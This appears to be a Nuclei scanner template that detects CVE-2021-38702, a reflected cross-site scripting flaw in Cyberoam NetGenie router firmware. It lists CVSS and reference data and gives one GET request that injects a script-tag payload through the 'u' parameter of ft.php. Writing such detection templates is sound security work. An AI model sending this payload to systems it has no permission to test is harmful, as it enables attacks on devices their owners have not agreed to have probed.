id: CVE-2021-38702 info: name: Cyberoam NetGenie Cross-Site Scripting author: geeknik severity: medium description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php. remediation: | Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability. reference: - https://seclists.org/fulldisclosure/2021/Aug/20 - https://nvd.nist.gov/vuln/detail/CVE-2021-38702 - http://www.cyberoamworks.com/NetGenie-Home.asp - http://packetstormsecurity.com/files/163859/Cyberoam-NetGenie-Cross-Site-Scripting.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-38702 cwe-id: CWE-79 epss-score: 0.0076 epss-percentile: 0.79085 cpe: cpe:2.3:o:cyberoamworks:netgenie_c0101b1-20141120-ng11vo_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cyberoamworks product: netgenie_c0101b1-20141120-ng11vo_firmware tags: cyberoam,netgenie,xss,router,seclists,cve,packetstorm,cve2021 http: - method: GET path: - "{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - "" - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4a0a00473045022100d7f707bd94d1ecabdb6bf8ec6c2aa2902662a01aa5b3e24ed38cb085be74d03a022059b5192b5ac0fab7f9f16f21b7c0eff9fe6f9eeadfb0d63a73476b1d9e4ec503:922c64590222798bb761d5b6d8e72950